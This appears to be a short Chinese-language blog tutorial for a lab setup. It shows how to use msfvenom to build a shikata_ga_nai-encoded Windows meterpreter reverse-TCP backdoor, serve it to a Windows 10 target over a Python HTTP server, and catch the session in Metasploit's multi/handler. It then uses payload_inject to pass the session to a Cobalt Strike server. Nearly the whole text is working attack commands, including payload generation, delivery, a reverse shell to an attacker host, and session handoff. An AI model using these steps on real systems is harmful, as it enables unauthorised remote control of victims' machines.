目录
kali操作系统


我这里是在虚拟机里面的windows10已经下载好msf的靶机。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4567 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 5 -f exe -o payload.exe

python -m http.server
![]()
使用靶机下载恶意代码:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options
set lhost 监控IP
set lport 监控端口
run 执行
在靶机执行后门程序中等待返回 meterpreter
background

或者在命令行里面直接输入sessions,显示当前存在的session:

use exploit/windows/local/payload_inject
![]()
set payload windows/meterpreter/reverse_http

show options(图一)
set lhost 192.168.0.2(设置cs服务器的地址,图二)
set lport 4567
set session 1(看情况而定)
set disablepayloadhander true
run


接下来就可以用cs进行实际操作!!!